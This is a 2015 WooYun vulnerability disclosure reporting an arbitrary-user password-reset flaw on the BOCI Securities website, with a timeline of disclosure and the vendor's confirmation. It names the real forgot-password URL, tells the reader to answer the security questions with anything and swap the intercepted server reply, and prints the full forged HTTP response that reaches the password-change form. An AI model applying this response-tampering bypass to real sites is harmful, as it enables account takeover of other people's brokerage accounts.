当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121040

漏洞标题:中银国际证券公司存在重置任意用户密码漏洞

相关厂商:中银国际证券

漏洞作者: wooyun.org

提交时间:2015-06-17 16:51

修复时间:2015-08-06 10:00

公开时间:2015-08-06 10:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-22: 厂商已经确认,细节仅向厂商公开
2015-07-02: 细节向核心白帽子及相关领域专家公开
2015-07-12: 细节向普通白帽子公开
2015-07-22: 细节向实习白帽子公开
2015-08-06: 细节向公众公开

简要描述:

你懂得

详细说明:

http://www.bocichina.com/boci/login/forgetPassword.jsp


11.png


就这个了

22.png


回答问题随便填,抓包。讲返回的包拦截,将以下包发出去!

HTTP/1.1 200 OK
Date: Tue, 16 Jun 2015 21:04:08 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html;charset=UTF-8
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 ID-0000627501262144 uproxy-2
Content-Length: 5035
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link href="/boci/css/css.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="/boci/share/js/jsUtils.js"></script>
<title>中银国际证券</title>
<link rel="shortcut icon" href="/boci/pic/favicon.ico"/>
<link rel="BookMark" href="/boci/pic/favicon.ico"/>
<style type="text/css">
<!--
.STYLE1 {color: #920022}
.STYLE2 {color: #348800}
.STYLE5 {
font-family:"微软雅黑", "宋体";
font-size: 18px;
font-weight: bold;
padding:10px;
}
-->
</style>
</head>
<script>
</script>
<script>
function check(){
var password=document.getElementById("passWord").value;
if(/^([A-Z]|[a-z]|[\d])*$/.test(password)==false||password.length<6||password.length>12){
alert("密码为 6-12 位字母或数字");
document.getElementById("passWord").value="";
document.getElementById("passWord").focus();
return false;
}
//新密码和旧密码是否相同
var password_1=document.getElementById("passWord_1").value;
if(password!=password_1){
alert("两次输入密码不相同");
document.getElementById("passWord_1").value="";
document.getElementById("passWord_1").focus();
return false;
}
}
</script>
<body>
<div id="layout">
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff" height="60">
<tr>
<td><a href="/boci/index/index.jsp?firstMenu=qtcd_index"><img src="/boci/pic/logo.jpg" width="315" height="60" border="0" /></a></td>
<td width="427"></td>
</tr>
</table>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffffff">
<tr>
<td width="900" background="/boci/pic/menu_07.jpg"><img src="/boci/pic/menu_07.jpg" width="6" height="13" /></td>
</tr>
</table>
</td>
</tr>
</table>
<table width="900" border="0" cellspacing="0" cellpadding="0">
<form action="/boci/user.do?method=updatePassword" method="post" name="thisForm" id="thisForm" onsubmit="return check()">
<tr>
<td width="20"></td>
<td height="35" background="/boci/pic/zcgl_30.jpg" class="text14" style="padding-left:60px;">忘记密码</td>
<td width="20"></td>
</tr>
<tr>
<td></td>
<td height="35" style="padding:10px; line-height:25px;"><p><table width="750" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><img src="/boci/pic/login/tab_top.gif" height="11" /></td>
</tr>
<tr>
<td valign="top" background="/boci/pic/login/tab_mid.gif" style="padding:10px 20px;"><table width="33%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="10"></td>
</tr>
</table>
<table width="35%" border="0" cellpadding="0" cellspacing="0" align="center">

<tr align="left" bgcolor="#F2F2F2">
<td colspan="3" style="padding: 2px 15px;">请输入新密码 :
<input name="passWord" id="passWord" type="password" class="sousuotiao" size="18" style="border:1px solid #cccccc;" />
</td>
</tr>

<tr align="left" bgcolor="#F2F2F2">
<td colspan="3" style="padding: 2px 15px;">新 密码 确认 :
<input name="passWord_1" id="passWord_1" type="password" class="sousuotiao" size="18" style="border:1px solid #cccccc;" />
</td>
</tr>
</table>
<table width="97" border="0" align="center" cellpadding="0" cellspacing="0">

<tr>
<td height="20"></td>
</tr>
</table>

<table width="33%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="center">
<td height="15"><input type="submit" name="Submit2" value="确定" class="button4" /></td>
</tr>
</table>


</td>
</tr>
<tr>
<td align="center"><img src="/boci/pic/login/tab_bot.gif" height="11" /></td>
</tr>
</table></td>
<td></td>
</tr>
<tr>
<td></td>
<td height="35" class="text14" style="padding-left:10px;">&nbsp;</td>
<td></td>
</tr>
</form>
</table>
<table width="900" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><iframe src="/boci/share/foot.jsp" frameborder="0" width="900" height="64" scrolling="no"></iframe></td>
</tr>
</table>
</div>
</body>
</html>


成功跳刀更改密码处

33.png


44.png

55.png

漏洞证明:

1.png

修复方案:

版权声明:转载请注明来源 wooyun.org@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-22 09:59

厂商回复:

cnvd确认并复现所述情况,转由cncert向证券行业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无